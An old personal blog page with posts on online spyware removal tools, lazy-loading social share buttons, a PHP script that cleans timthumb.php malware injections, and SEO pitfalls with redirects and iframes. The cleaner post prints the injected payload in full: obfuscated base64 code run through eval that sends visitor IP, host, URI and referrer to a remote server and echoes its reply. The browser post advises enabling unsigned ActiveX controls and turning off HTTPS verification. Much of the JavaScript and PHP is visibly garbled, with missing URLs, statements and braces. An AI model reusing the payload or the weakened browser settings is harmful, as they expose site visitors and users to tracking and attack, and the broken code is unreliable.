Saturday, April 07, 2012

Online spyware removal


(part of the Windows course :)

Note: if you don't have access to Windows Safe Mode - which is essential when cleaning viruses: before scanning with these applications I suggest you download and run from a flash drive Hitman pro. If it doesn't succeed try with a bootable CD running Kaspersky  then launch the WindowsUnlocker feature. Only then you can continue with MalwareBytes.
Here is a list of free online anti-spyware tools that will help you to clean up a PC from spyware trojans and viruses. Compared with the standard anti-virus software they have the following:

  • Advantages:
    - no need for application installation on your computer.
    - online scanners use the latest antivirus definitions.
  • Disadvantages:
    - some online scanners like Kaspersky online scanner and Panda Active Scan list only viruses they find without cleaning them. (Panda Active scan actually only finds viruses but cleans up spyware). This way they could be used for a system check only.
    The following compact anti-spyware tools have a small size that will not affect your system's performance, and will not slow down your application loading time. So give them a try and don't forget to update the definitions first!
  • A-squared Web Malware Scanner
  • SuperAntiSpyware makes a sophisticated spyware analysis on your systemsuper anti spyware 
  • Anti-Spyware for the web from TrendMicro HouseCall
  • Microsoft Security Essentials
  • Norton's Symantec on-line security scan and virus detection 
  • F-Secure Online Virus Scanner
Before you scan your PC
Some of the online scanners require specific access to run. Under Windows, if you notice at the upper part of the screen the Information Bar click on it and select Enable, Install or Run the file from the context menu.
Information Bar

Some online scanners work in Internet Explorer browser only and require ActiveX controls to be turned on. You can enable ActiveX by switching to menu Tools on Internet Explorer:

Internet explorer security options
1. Go to Internet Options.
2. Then on the Security tab, click on Default Level.

Another way of enabling ActiveX is to add the antivirus program's website to your Trusted sites:
1. Go to Internet Options -> Security Tab -> Trusted sites.
2. For the Security Level for this zone click on the button Custom level...
3. Fill in the full address of the website you want to have access to in the input field Add this website into this zone & uncheck the mark on Require server verification(https:) for all sites in this zone.
4. Check the availability of ActiveX scripting in Internet Explorer. In the field Security level for this zone click on Custom level button and under ActiveX controls and plugins enable:

Automatic Prompting for ActiveX controls
Download Signed ActiveX controls
Download Unsigned ActiveX controls
Initialize and run ActiveX controls that are not marked as safe
Run ActiveX controls and plug-ins
Script ActiveX controls marked safe for scripting

Virus removal tools
If you really know what virus has infected your PC you can browse through major antivirus providers databases and download tools that will specifically clean up your computer at a much higher speed. Sometimes there are some virus variants that are not so easy to clean up so you can try downloading several different cleaning utilities in order to have a broader spectrum for catching the intruder. These tools need to be downloaded and run as standalone applications:

And if you think that you have infected file you can always send it for a check to:
Protection tool
SpywareBlaster - prevents the installation of spyware, adware, dialers, browser hijackers, and other potentially unwanted programs. It will also protect your Internet browser.

  1. Under “Quick Tasks” click “Download Latest Protection Updates”.
  2. Click the “Check for Updates” button.
  3. After updating, click “Protection” near the top.
  4. Under “Quick Tasks” click “Enable All Protection”.
spyware blaster

How to save time?
Instead of testing all the on-line scanners you can first run a quick check & clean procedure with Dr.web's CureItRun the application and go to Options -> Change settings. Choose the "Scan tab" and Uncheck "Heuristic analysis". Then click on the Start Scanning button.

Last but not least you must definitely try the great free Anti-malware scanner/cleaner offered from MalwareBytes:

Happy cleaning!

Saturday, November 26, 2011

Load Facebook like, Google+ social buttons on mouse over

The following two techniques will definitely speed up your web page loading times if you want to use social sharing buttons.
The action performed by the first technique is simple:
1) Do not load or render third party resources (i.e. external javascript files) until visitor places the mouse over the social buttons.
2) Mimic social buttons appearance via simple images.
3) When the user hovers the buttons, temporarily used images are being hidden and replaced by the original buttons from Google, Facebook, LinkedIn, etc.
Here is more info on the subject:

First place div tag with id = sharebox and put simple .png mock-up graphics of the social buttons inside.
<div id=sharebox > <img src="social.png" /> </div>

<span id="social_share"><img src= "images/user.gif" /></span>
<a href="" class="twitter-share-button" data-count="horizontal"></a>
<div class="g-plusone" data-annotation="inline" data-size="medium" data-width="120"></div>
<script type="IN/Share" data-counter="right"></script>
<div class="fb-like" data-layout="button_count" data-send="false" data-show-faces="false" data-width="90"></div>

Then add this simple working JavaScript code placed below:

document.getElementById('social_share').addEventListener("mouseenter", load_scripts);
function load_js_script(src, call_back) {
    var scriptTag = document.createElement("script");
    scriptTag.type = "text/javascript";
    scriptTag.src = src;
    scriptTag.async = true;
    scriptTag.onload = function () {
        if (typeof call_back != 'undefined') {

function load_scripts(e) { = '';
    if (typeof twttr != 'undefined') {
    } else {
    if (typeof FB != 'undefined') {
            status: true,
            cookie: true,
            xfbml: true
    } else {
        load_js_script("//", function () {
                status: true,
                cookie: true,
                xfbml: true
    if (typeof gapi != 'undefined') {
        var gplus = document.getElementByClassName('g-plusone');
    } else {

    if (typeof IN != 'undefined') {
    } else {

Second and faster way of loading those buttons is by using specially styled Iframes. This way we are not loading the third-party libraries locally such as all.js or plusone.js which speeds the code significantly. Here is how:

document.getElementById('social_share').addEventListener("mouseenter", load_scripts);

function load_scripts() { = '';
    makeIframe("", "google_slot");
    makeIframe("", "facebook_slot");

function makeIframe(url, call_id) {
    var iframe = document.createElement('iframe'); = call_id;
    iframe.src = url;

P.S. These are just sample images. Please use/create placeholder images of your own taste.

Friday, October 14, 2011

Timthumb.php exploit cleaner

After having a day of manually cleaning about 300+ leftovers of the newest version of timthumb.php malware here is a working exploit cleaner that you can use it to check your whole web server for vulnerabilities and automatically clean his mess:
Usage: just save and run the following .php file from the root directory of your domain.
$path[] = '../*';
while(count($path) != 0)
    $v = array_shift($path);
    foreach(glob($v) as $item)
        if (is_dir($item))
        $path[] = $item . '/*';
        elseif (is_file($item))
            if (preg_match('/index.php/is', $item)) {
                echo "processing $item - last modified at: " . date ("F d Y H:i:s.", filemtime($item));
                echo "<br /> ";
function restore_hsc($val){
    $val = str_replace('&amp;', '&', $val);
    $val = str_replace('&ouml;', '?', $val);
    $val = str_replace('&auml;', '?', $val);
    $val = str_replace('&uuml;', '?', $val);
    $val = str_replace('&lt;', '<', $val);
    $val = str_replace('&gt;', '>', $val);
    $val = str_replace('&quot;', '"', $val);
    return $val;
function disinfect($filename) {
    $pattern='<?php $_F=__FILE__;$_X=\'Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+\';eval(base64_decode(\'JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==\'));$ua = urlencode(strtolower($_SERVER[\'HTTP_USER_AGENT\']));$ip = $_SERVER[\'REMOTE_ADDR\'];$host = $_SERVER[\'HTTP_HOST\'];$uri = urlencode($_SERVER[\'REQUEST_URI\']);$ref = urlencode($_SERVER[\'HTTP_REFERER\']);$url = $url.\'?ip=\'.$ip.\'&host=\'.$host.\'&uri=\'.$uri.\'&ua=\'.$ua.\'&ref=\'.$ref; $tmp = file_get_contents($url); echo $tmp; ?>';
    $pattern=trim(htmlspecialchars($pattern)); //prepare pattern
    $lines = file($filename);
    for ($i=0; $i<sizeof($lines); $i++) {
        if(strstr($current_line, $pattern)) {
            $lines[$i]=str_replace($pattern, "", htmlspecialchars(trim($lines[$i])));
            $lines[$i]= preg_replace('/\s\s+/', ' ', $lines[$i]);
    $lines = array_values($lines);
    if ($found >0) {
        $file = fopen($filename, "w");
        fwrite($file, implode("\n",$lines));
        echo " <span style=\"color:red;\" is infected. Cured: $found injected objects</span> <br />";
    else {echo "clean <br /> ";}
P.S. don't forget to share if the script has helped you :)

Monday, July 19, 2010

SEO iframes and redirects

Hidden redirects
Do you know what's the difference between these two custom error not-found pages? (where to find them? hint: look in your .htaccess file)
ErrorDocument 404

ErrorDocument 404 error404.php
It appears that the first line returns 302 Found header code and then redirects to your 404 page, which is a really bad thing from an SEO standpoint and gets penalized. The second line gives you the normal 404 pages returning a proper 404 header code.

Too many 301 redirects
Can you recognize this code?
RewriteRule (.*)$1 [R=301,L] 
You may think that it is OK when you redirect your old to a new domain (in case of having Panda penalty applied) via 301 temporary header redirect. But what happens if the old domain already has some kind of penalty applied. Well, it automatically transfers to your new domain, because as you've might noticed 301 is actually a PERMANENT redirect and transfers all the weight from the previous domain. So go, check and fix those two cases and be really careful!

Usage of iframes between subdomains
On one website(~500pages) with over 300 pages indexed in Google, I've used an iframe linking to other sub-domain in order to display relevant content. When I removed the iframe almost immediately, in less than 24 hours my indexed results grew from 300 to 360.
But why?
I started searching on the forums and it appeared that Google penalty filter was triggered by such a huge usage of iframes (mistakenly taken as poisoning attack). Here is a short explanation from Matt Cutts on this:
"Essentially, our search algorithm saw a large area on the blog that was due to an IFRAME included from another site and that looked spammy to our automatic classifier."

Remove all the iframes that you have or replace them with ajax calls or just static HTML content.
Wait a few days and run: site: to see the difference in the results!

Good luck!

Subscribe To My Channel for updates